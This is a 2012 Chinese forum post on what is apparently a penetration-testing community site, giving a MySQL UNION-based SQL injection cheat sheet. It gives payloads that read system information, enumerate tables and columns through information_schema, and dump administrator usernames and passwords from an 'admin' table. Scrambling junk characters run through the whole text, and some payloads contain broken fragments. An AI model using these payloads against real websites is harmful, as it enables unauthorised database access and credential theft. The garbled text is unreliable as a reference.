中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法' P; \  R9 h  h" ]* Q, T, T7 r6 `) N

8 `# w' D2 K. B5 {学习盲注前先了解下 IFORMATION_SCHEMA 库7 q5 M: z: g, P" t$ r# H

# ?1 v8 K" j* x1 _+ Y( JMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
- Y5 e- r$ v+ {# I5 K! v存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。. }* d9 U5 m: R1 C
1.得到所有数据库名:
7 r- u# w6 @* I" s9 }. B% P9 M|SCHEMATA ->存储数据库名的表
! j" z, G2 V8 p5 d  u! \|---字段:SCHEMA_NAME ->数据库名称
/ i* T: N; o' P5 V1 b% b- J( }- _% {4 k/ {0 h: c' Z. p. c9 e! u) @0 K
|TABLES ->存储表名
4 H1 V( J7 v6 ~0 g) \3 Y|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名4 T7 x  b% u) J% A! m6 I
|---字段:TABLE_NAME ->存储表的表名% _5 B0 {. A1 L: M" T1 x
5 ?, O5 E0 p# \
|COLUMNS ->存储的字段名表# ~9 [+ L4 I/ j( r* K
|---字段:TABLE_SCHEMA ->该字段所属数据库名
! S8 [- W$ r3 `|---字段:TABLE_NAME ->存储所属表的名称: i6 F! |/ q3 }# ]7 A  t

+ e$ _& Q. ~; q2 v$ G' r|---字段:COLUMN_NAME ->该字段的名称
3 H( j4 S9 n7 i1 @8 m  ]1 R7 \+ A$ o6 ]- }9 _0 W) }8 o  v
4 j/ O7 n* x: `, p( U
- C" f& p6 @6 d. q
###########################################################################
. W0 Q. }7 |. }  C4 `$ W8 I/ X: B. z
6 p$ P& |' b( G( U3 Z/ O" i9 C5 k0x001 获取系统信息:1 O  x6 y. A; o; o9 p& t

+ C) _& L3 m6 `/ xunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
9 U* ], E  |: p6 d# a( x0 z6 Z- k1 \6 i6 Q2 C- [! X
/*2 p; r# Q" Q  Y  [1 I% P; L

/ ]) t: b; S" ^8 `' h3 s, k@@global.version_compile_os 获取系统版本
0 f- X2 U* G2 _  h2 s) ?
2 m8 t% i7 }4 g- r1 p/ g7 S$ s@@datadir 数据库路径
" B2 Y' e/ ]. ?) V* qdatabase() 当前数据库名称  R' w# J  Y2 W. T
0x3c62723e 换行HEX值
9 O$ ]8 ~5 T1 L1 v4 H6 p
" p$ V( g4 `. t- m- \: [$ }* X*/2 e, q" t6 _& U. Z3 T& ^0 C

0 e- w5 R7 i7 x7 j" x+ e6 o5 a 1 x( P6 a9 `; Y2 h) A5 q
! v6 a, v% r! y( U4 {1 X: G
######################################################################* n! w3 i+ r5 y  i- O3 j

/ s- H" R3 J1 J9 b+ j0x002 获取表名
* ]/ S# p" u4 x# c" m) ]9 P5 @1 J5 c3 w; P$ l
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
- C4 D" h; o, a- @0 `! ], _% H4 z/ ~
& E6 I' U/ [8 u! A% t0 }
6 f/ g/ E6 h% P# `3 [! A) f  n( e* T6 ~/ a8 C8 `5 o
/*
/ o7 p, e. w8 J( f( T( I
% W% F1 t5 [) Q( O- v4 b% E2 s0x67617264656e 为当前数据库名% c3 b8 v* U' K0 R9 l1 Q
; T+ Z! v( R3 \9 U1 ?3 n
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名, B* o1 M  f7 l
$ @4 j; v: P8 {+ U4 S3 \
*/$ u2 p9 G/ F1 \
4 _0 K- U8 K  h, Q5 y3 f
######################################################################1 w: ~4 s0 {2 J4 I+ @
# ^3 O/ [# @" E% ^$ h/ I

. E4 }8 b+ w! U/ ~* P  N- {+ ]" K$ [  s/ }4 R( O( K
0x003 获取字段
6 _3 s4 j" v+ w7 U# A- P  g
7 D+ R: T$ f, v3 r; kunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /** p/ v: t) b& u

2 Y$ e) x1 }7 p5 M: Q/*- e$ l) A' A4 t  ^/ }5 c" J& B

" F3 n2 J% G. \5 C: T. Wgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
& c/ j" O( `  y( N4 N9 b# t7 [; b% @
0x61646d696e ->选择一个表
# d. D! f+ V- c/ h0 O8 B
4 I* t* f5 n2 R7 O* w0x67617264656e ->数据库名0 ~' [/ z* @" k3 J( d3 A
: ~, v  M" y3 d4 [) Y; N
*/
* D7 @1 ~& R$ Y3 U. G1 U/ z
& i" `/ R0 h3 H#####################################################################
. _4 r  N8 d! h9 _
0 K. V6 [2 w% t6 V' O
9 A0 W* n( \- e7 y
; ~- a4 `+ `" i, u0 |0x004 获取数据
" W# I4 C8 u6 K7 I/ ~/ N; K, N6 {( R3 W& ]2 Q/ X
union select 1,2,37 v2 F& Q, H( I
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin6 `* w7 p3 y' i

( J+ N0 I; }$ u0 n4 V  P% s0 Q+ M. lunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin4 v( H5 S9 n6 B

$ k: E( O9 r2 }7 t# c
* i! u  b* u+ a0 a1 S! n& E
5 U% s! M( M' {6 P7 v$ P$ S/*6 [" x" |7 ^3 B

0 z( J+ ^3 J7 L- X! B; C0x3c62723e 换行符号HEX编码
8 \1 @: a) T# Z) x0 `: N
  o% r2 Z3 a/ Vgroup_concat 同时获得该字段所有数据) P/ m. ^  {: y
5 T! B  k* J% u) t
*/+ D' R- B3 `9 v
. B9 \3 m/ Q, V. E- T0 B( v6 ^* x# n





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2